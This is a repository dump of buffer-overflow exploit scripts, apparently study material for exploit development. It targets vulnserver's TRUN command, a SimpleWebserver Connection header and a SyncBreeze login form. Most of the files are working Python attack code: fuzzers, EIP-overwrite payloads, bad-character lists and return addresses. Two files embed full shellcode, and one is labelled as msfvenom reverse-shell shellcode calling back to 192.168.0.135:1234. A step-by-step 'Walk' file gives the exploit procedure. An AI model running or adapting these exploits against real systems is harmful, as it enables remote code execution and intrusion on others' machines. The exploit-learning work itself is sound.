"\xb9\x1e\x10\x7f\x81\x9a\xcf\xbc\x0c\x23\x9d\xf9\x2a\x33\x5b" 25 | "\x01\x77\x67\x33\x54\x21\xd1\xf5\x0e\x83\x8b\xaf\xfd\x4d\x5b" 26 | "\x29\xce\x4d\x1d\x36\x1b\x38\xc1\x87\xf2\x7d\xfe\x28\x93\x89" 27 | "\x87\x54\x03\x75\x52\xdd\x23\x94\x76\x28\xcc\x01\x13\x91\x91" 28 | "\xb1\xce\xd6\xaf\x31\xfa\xa6\x4b\x29\x8f\xa3\x10\xed\x7c\xde" 29 | "\x09\x98\x82\x4d\x29\x89") 30 | 31 | 32 | Shellcode="A" * 2003 + "\xaf\x11\x50\x62" + "\x90" *32 +exploit 33 | 34 | try: 35 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 36 | s.connect(('192.168.1.133',9999)) 37 | print("Sending pattern to Remote server....." 
) 38 | s.send(('TRUN /.:/'+ Shellcode)) 39 | s.close() 40 | 41 | except: 42 | print("Error in connecting") 43 | sys.exit() 44 | -------------------------------------------------------------------------------- /BufferOverflow/Script/BOF sc/bad_char: -------------------------------------------------------------------------------- 1 | //List of bad characters 2 | 3 | 4 | badchars = ("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 5 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 6 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 7 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 8 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 9 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 10 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 11 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 12 | -------------------------------------------------------------------------------- /BufferOverflow/Script/BOF sc/bad_char.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 5 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 
6 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 7 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 8 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 9 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 10 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 11 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 12 | 13 | Shellcode="A" * 2003 +"B" * 4 + badchars 14 | 15 | 16 | try: 17 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 18 | s.connect(('192.168.1.133',9999)) 19 | print("Sending pattern to Remote server....." 
) 20 | s.send(('TRUN /.:/'+ Shellcode)) 21 | s.close() 22 | 23 | except: 24 | print("Error in connecting") 25 | sys.exit() 26 | -------------------------------------------------------------------------------- /BufferOverflow/Script/BOF sc/bad_chat.py: -------------------------------------------------------------------------------- 1 | import sys, socket 2 | 3 | badchars = ("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 4 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 5 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 6 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 7 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 8 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 9 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 10 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 11 | 12 | buffer ="A" * 524 + "B" *4 + badchars 13 | 14 | try: 15 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 16 | s.connect(('192.168.0.134',9999)) 17 | print "Sending Exploit to remote system......." 
18 | s.send((buffer)) 19 | s.recv(1024) 20 | s.close() 21 | 22 | 23 | 24 | except: 25 | print("Unable to connect to remote server ......") 26 | -------------------------------------------------------------------------------- /BufferOverflow/Script/BOF sc/bc_len.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | badchars = ("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 4 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 5 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 6 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 7 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 8 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 9 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 10 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 11 | 12 | print ("Length %s by" % str(len(badchars)) -------------------------------------------------------------------------------- /BufferOverflow/Script/BOF sc/fuzz.py: -------------------------------------------------------------------------------- 1 | import sys, socket 2 | from time import sleep 3 | 4 | buffer ="A" * 100 5 | 6 | while True: 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.1.133',9999)) 10 | print "Trying with buffer length %d" % len(buffer) 11 | s.send(('TRUN 
/.:/'+ buffer)) 12 | s.close() 13 | sleep(1) 14 | buffer=buffer + "A"*100 15 | 16 | 17 | except: 18 | print("Fuzzing Crashed at %s by" % str(len(buffer))) 19 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/Script/BOF sc/return_add.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | "Ret address=>625011AF" 5 | Shellcode="A" * 2003 + "\xaf\x11\x50\x62" 6 | 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.1.133',9999)) 10 | print("Sending pattern to Remote server....." ) 11 | s.send(('TRUN /.:/'+ Shellcode)) 12 | s.close() 13 | 14 | except: 15 | print("Error in connecting") 16 | sys.exit() 17 | -------------------------------------------------------------------------------- /BufferOverflow/Script/Eip_control.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | Shellcode="A" * 2003 +"B" * 4 5 | 6 | 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.1.133',9999)) 10 | print("Sending pattern to Remote server....." ) 11 | s.send(('TRUN /.:/'+ Shellcode)) 12 | s.close() 13 | 14 | except: 15 | print("Error in connecting") 16 | sys.exit() 17 | -------------------------------------------------------------------------------- /BufferOverflow/Script/Eip_controlsd.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | 5 | Shellcode="A" * 1788 + "B" * 4 6 | eob="HTTP/1.1\r\n\r\n" 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.1.133',80)) 10 | print("Sending pattern to Remote server" ) 11 | s.send(('GET'+ Shellcode + eob)) 12 | print s.recv(1024) 13 | print "\nDone!." 
14 | s.close() 15 | 16 | except: 17 | print("Error in connecting") 18 | sys.exit() 19 | -------------------------------------------------------------------------------- /BufferOverflow/Script/ShellCode.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | import struct 4 | 5 | "Ret address=>625011AF" 6 | 7 | exploit=("\xdb\xd1\xbb\xb1\x96\x2f\x26\xd9\x74\x24\xf4\x5a\x29\xc9\xb1" 8 | "\x52\x83\xc2\x04\x31\x5a\x13\x03\xeb\x85\xcd\xd3\xf7\x42\x93" 9 | "\x1c\x07\x93\xf4\x95\xe2\xa2\x34\xc1\x67\x94\x84\x81\x25\x19" 10 | "\x6e\xc7\xdd\xaa\x02\xc0\xd2\x1b\xa8\x36\xdd\x9c\x81\x0b\x7c" 11 | "\x1f\xd8\x5f\x5e\x1e\x13\x92\x9f\x67\x4e\x5f\xcd\x30\x04\xf2" 12 | "\xe1\x35\x50\xcf\x8a\x06\x74\x57\x6f\xde\x77\x76\x3e\x54\x2e" 13 | "\x58\xc1\xb9\x5a\xd1\xd9\xde\x67\xab\x52\x14\x13\x2a\xb2\x64" 14 | "\xdc\x81\xfb\x48\x2f\xdb\x3c\x6e\xd0\xae\x34\x8c\x6d\xa9\x83" 15 | "\xee\xa9\x3c\x17\x48\x39\xe6\xf3\x68\xee\x71\x70\x66\x5b\xf5" 16 | "\xde\x6b\x5a\xda\x55\x97\xd7\xdd\xb9\x11\xa3\xf9\x1d\x79\x77" 17 | "\x63\x04\x27\xd6\x9c\x56\x88\x87\x38\x1d\x25\xd3\x30\x7c\x22" 18 | "\x10\x79\x7e\xb2\x3e\x0a\x0d\x80\xe1\xa0\x99\xa8\x6a\x6f\x5e" 19 | "\xce\x40\xd7\xf0\x31\x6b\x28\xd9\xf5\x3f\x78\x71\xdf\x3f\x13" 20 | "\x81\xe0\x95\xb4\xd1\x4e\x46\x75\x81\x2e\x36\x1d\xcb\xa0\x69" 21 | "\x3d\xf4\x6a\x02\xd4\x0f\xfd\xed\x81\x0e\x6e\x85\xd3\x10\x94" 22 | "\x84\x5d\xf6\xfe\x38\x08\xa1\x96\xa1\x11\x39\x06\x2d\x8c\x44" 23 | "\x08\xa5\x23\xb9\xc7\x4e\x49\xa9\xb0\xbe\x04\x93\x17\xc0\xb2" 24 | "\xbb\xf4\x53\x59\x3b\x72\x48\xf6\x6c\xd3\xbe\x0f\xf8\xc9\x99" 25 | "\xb9\x1e\x10\x7f\x81\x9a\xcf\xbc\x0c\x23\x9d\xf9\x2a\x33\x5b" 26 | "\x01\x77\x67\x33\x54\x21\xd1\xf5\x0e\x83\x8b\xaf\xfd\x4d\x5b" 27 | "\x29\xce\x4d\x1d\x36\x1b\x38\xc1\x87\xf2\x7d\xfe\x28\x93\x89" 28 | "\x87\x54\x03\x75\x52\xdd\x23\x94\x76\x28\xcc\x01\x13\x91\x91" 29 | "\xb1\xce\xd6\xaf\x31\xfa\xa6\x4b\x29\x8f\xa3\x10\xed\x7c\xde" 30 | "\x09\x98\x82\x4d\x29\x89") 31 | 32 | 
jmpesp=struct.pack("625011AF" 5 | Shellcode="A" * 2003 + "\xaf\x11\x50\x62" 6 | 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.1.133',9999)) 10 | print("Sending pattern to Remote server....." ) 11 | s.send(('TRUN /.:/'+ Shellcode)) 12 | s.close() 13 | 14 | except: 15 | print("Error in connecting") 16 | sys.exit() 17 | -------------------------------------------------------------------------------- /BufferOverflow/SimpleWebserver/Eip_control.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | 4 | 5 | import socket 6 | import sys 7 | 8 | 9 | junk = "A" * 1284 +"B" * 4 + "C" * 1200 10 | 11 | 12 | 13 | req = "GET / HTTP/1.1\r\n" 14 | req += "Host: 192.168.0.134\r\n" 15 | req += "Connection:" + junk + "B" *4 +"\r\n" 16 | req += "\r\n" 17 | 18 | 19 | try: 20 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 21 | s.connect(('192.168.0.134',80)) 22 | print "Sendin Payload......" 23 | s.send(req) 24 | s.recv(1024) 25 | s.close() 26 | 27 | except: 28 | print("Fuzzing Crashed at %s by" % str(len(buffer))) 29 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/SimpleWebserver/Shellcode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | 4 | 5 | import socket 6 | import sys 7 | 8 | 9 | #msfvenom -p windows/shell_reverse_tcp LHOS=192.168.0.135 LPORT=1234 EXITFUNC=thread -f c -b "\x00\x00\x09\x0a" 10 | 11 | Shellcode=("\xda\xd0\xd9\x74\x24\xf4\xba\x8f\xe1\xbb\xbe\x5e\x29\xc9\xb1" 12 | "\x52\x31\x56\x17\x83\xc6\x04\x03\xd9\xf2\x59\x4b\x19\x1c\x1f" 13 | "\xb4\xe1\xdd\x40\x3c\x04\xec\x40\x5a\x4d\x5f\x71\x28\x03\x6c" 14 | "\xfa\x7c\xb7\xe7\x8e\xa8\xb8\x40\x24\x8f\xf7\x51\x15\xf3\x96" 15 | "\xd1\x64\x20\x78\xeb\xa6\x35\x79\x2c\xda\xb4\x2b\xe5\x90\x6b" 16 | "\xdb\x82\xed\xb7\x50\xd8\xe0\xbf\x85\xa9\x03\x91\x18\xa1\x5d" 17 | 
"\x31\x9b\x66\xd6\x78\x83\x6b\xd3\x33\x38\x5f\xaf\xc5\xe8\x91" 18 | "\x50\x69\xd5\x1d\xa3\x73\x12\x99\x5c\x06\x6a\xd9\xe1\x11\xa9" 19 | "\xa3\x3d\x97\x29\x03\xb5\x0f\x95\xb5\x1a\xc9\x5e\xb9\xd7\x9d" 20 | "\x38\xde\xe6\x72\x33\xda\x63\x75\x93\x6a\x37\x52\x37\x36\xe3" 21 | "\xfb\x6e\x92\x42\x03\x70\x7d\x3a\xa1\xfb\x90\x2f\xd8\xa6\xfc" 22 | "\x9c\xd1\x58\xfd\x8a\x62\x2b\xcf\x15\xd9\xa3\x63\xdd\xc7\x34" 23 | "\x83\xf4\xb0\xaa\x7a\xf7\xc0\xe3\xb8\xa3\x90\x9b\x69\xcc\x7a" 24 | "\x5b\x95\x19\x2c\x0b\x39\xf2\x8d\xfb\xf9\xa2\x65\x11\xf6\x9d" 25 | "\x96\x1a\xdc\xb5\x3d\xe1\xb7\x79\x69\xe9\xc0\x12\x68\xe9\xca" 26 | "\x30\xe5\x0f\xb8\xa4\xa0\x98\x55\x5c\xe9\x52\xc7\xa1\x27\x1f" 27 | "\xc7\x2a\xc4\xe0\x86\xda\xa1\xf2\x7f\x2b\xfc\xa8\xd6\x34\x2a" 28 | "\xc4\xb5\xa7\xb1\x14\xb3\xdb\x6d\x43\x94\x2a\x64\x01\x08\x14" 29 | "\xde\x37\xd1\xc0\x19\xf3\x0e\x31\xa7\xfa\xc3\x0d\x83\xec\x1d" 30 | "\x8d\x8f\x58\xf2\xd8\x59\x36\xb4\xb2\x2b\xe0\x6e\x68\xe2\x64" 31 | "\xf6\x42\x35\xf2\xf7\x8e\xc3\x1a\x49\x67\x92\x25\x66\xef\x12" 32 | "\x5e\x9a\x8f\xdd\xb5\x1e\xaf\x3f\x1f\x6b\x58\xe6\xca\xd6\x05" 33 | "\x19\x21\x14\x30\x9a\xc3\xe5\xc7\x82\xa6\xe0\x8c\x04\x5b\x99" 34 | "\x9d\xe0\x5b\x0e\x9d\x20") 35 | 36 | 37 | 38 | junk = "A" * 4992 +"B" * 4 + "\x90" * 30 + Shellcode + "C" *4 39 | 40 | 41 | 42 | req = "GET / HTTP/1.1\r\n" 43 | req += "Host: 192.168.0.134\r\n" 44 | req += "Connection:" + junk + "B" *4 +"\r\n" 45 | req += "\r\n" 46 | 47 | 48 | try: 49 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 50 | s.connect(('192.168.0.134',80)) 51 | print "Sendin Payload......" 
52 | s.send(req) 53 | s.recv(1024) 54 | s.close() 55 | 56 | except: 57 | print("Fuzzing Crashed at %s by" % str(len(buffer))) 58 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/SimpleWebserver/Walk: -------------------------------------------------------------------------------- 1 | SImpleWebserver 2 | 3 | IP : 192.168.0.134 4 | port 80 5 | _____________________________ 6 | 7 | 1. crash at 5000 8 | 2. pattern EIP=> 79433179 9 | 3. Offset => 2284 10 | 4. Control EIP "A"*2284 +"B" *4 + "C" *500 11 | 5. Finding Bad char ="\x00\x09\x0a" 12 | 6. JMP ESP "FFE4" 13 | 8. Control return add 14 | 9. shellcode =>msfvenom -p Windows/shell_reverse_tcp LHOS=192.168.0.135 LPORT=1234 EXITFUNC=thread -f c -b "\x00\x00\x09\x0a" 15 | 16 | 17 | 18 | 19 | 20 | -------------------------------------------------------------------------------- /BufferOverflow/SimpleWebserver/badchar.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | 4 | 5 | import socket 6 | import sys 7 | 8 | 9 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x80\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 10 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 11 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 12 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 13 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 14 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 15 | 
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 16 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 17 | 18 | junk = "A" * 1800 +"B" * 4 + badchars + "C" *200 19 | 20 | 21 | 22 | req = "GET / HTTP/1.1\r\n" 23 | req += "Host: 192.168.0.134\r\n" 24 | req += "Connection:" + junk + "B" *4 +"\r\n" 25 | req += "\r\n" 26 | 27 | 28 | try: 29 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 30 | s.connect(('192.168.0.134',80)) 31 | print "Sendin Payload......" 32 | s.send(req) 33 | s.recv(1024) 34 | s.close() 35 | 36 | except: 37 | print("Fuzzing Crashed at %s by" % str(len(buffer))) 38 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/SimpleWebserver/fuzzer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | 4 | 5 | import socket 6 | import sys 7 | 8 | 9 | junk = "A"*5000 10 | 11 | 12 | 13 | req = "GET / HTTP/1.1\r\n" 14 | req += "Host: 192.168.0.134\r\n" 15 | req += "Connection:" + junk + "\r\n" 16 | req += "\r\n" 17 | 18 | 19 | try: 20 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 21 | s.connect(('192.168.0.134',80)) 22 | print "Sendin Payload......" 
23 | s.send(req) 24 | s.recv(1024) 25 | s.close() 26 | 27 | except: 28 | print("Fuzzing Crashed at %s by" % str(len(buffer))) 29 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/SyncBreeze-Server/Bad_cahr.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import os 4 | import sys 5 | 6 | badchars = ( 7 | "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10" 8 | "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" 9 | "\x21\x22\x23\x24\x27\x28\x29\x2a\x2c\x2d\x2e\x2f\x30" 10 | "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3e\x3f\x40" 11 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" 12 | "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" 13 | "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" 14 | "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" 15 | "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" 16 | "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" 17 | "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" 18 | "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" 19 | "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" 20 | "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" 21 | "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" 22 | "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" 23 | ) 24 | crash = "A" * 780 + "B" * 4 25 | crash += badchars 26 | 27 | fuzz="username="+crash+"&password=A" 28 | 29 | buffer="POST /login HTTP/1.1\r\n" 30 | buffer+="Host: 192.1.0.134\r\n" 31 | buffer+="User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0\r\n" 32 | buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" 33 | buffer+="Accept-Language: en-US,en;q=0.5\r\n" 34 | 
buffer+="Referer: http://192.168.0.134/login\r\n" 35 | buffer+="Connection: close\r\n" 36 | buffer+="Content-Type: application/x-www-form-urlencoded\r\n" 37 | buffer+="Content-Length: "+str(len(fuzz))+"\r\n" 38 | buffer+="\r\n" 39 | buffer+=fuzz 40 | 41 | expl = socket.socket (socket.AF_INET, socket.SOCK_STREAM) 42 | expl.connect(("192.168.0.134", 80)) 43 | expl.send(buffer) 44 | expl.close() -------------------------------------------------------------------------------- /BufferOverflow/SyncBreeze-Server/EIP_control.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import os 4 | import sys 5 | 6 | crash = "A" * 780 + "V" * 4 7 | crash += "C" * (100-len(crash)) 8 | 9 | fuzz="username="+crash+"&password=A" 10 | 11 | buffer="POST /login HTTP/1.1\r\n" 12 | buffer+="Host: 192.1.0.134\r\n" 13 | buffer+="User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0\r\n" 14 | buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" 15 | buffer+="Accept-Language: en-US,en;q=0.5\r\n" 16 | buffer+="Referer: http://192.168.0.134/login\r\n" 17 | buffer+="Connection: close\r\n" 18 | buffer+="Content-Type: application/x-www-form-urlencoded\r\n" 19 | buffer+="Content-Length: "+str(len(fuzz))+"\r\n" 20 | buffer+="\r\n" 21 | buffer+=fuzz 22 | 23 | expl = socket.socket (socket.AF_INET, socket.SOCK_STREAM) 24 | expl.connect(("192.168.0.134", 80)) 25 | expl.send(buffer) 26 | expl.close() -------------------------------------------------------------------------------- /BufferOverflow/SyncBreeze-Server/Fuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import os 4 | import sys 5 | 6 | crash = "A" * 1100 7 | 8 | fuzz="username="+crash+"&password=A" 9 | 10 | buffer="POST /login HTTP/1.1\r\n" 11 | buffer+="Host: 192.1.0.134\r\n" 12 | buffer+="User-Agent: Mozilla/5.0 (X11; Linux i686; 
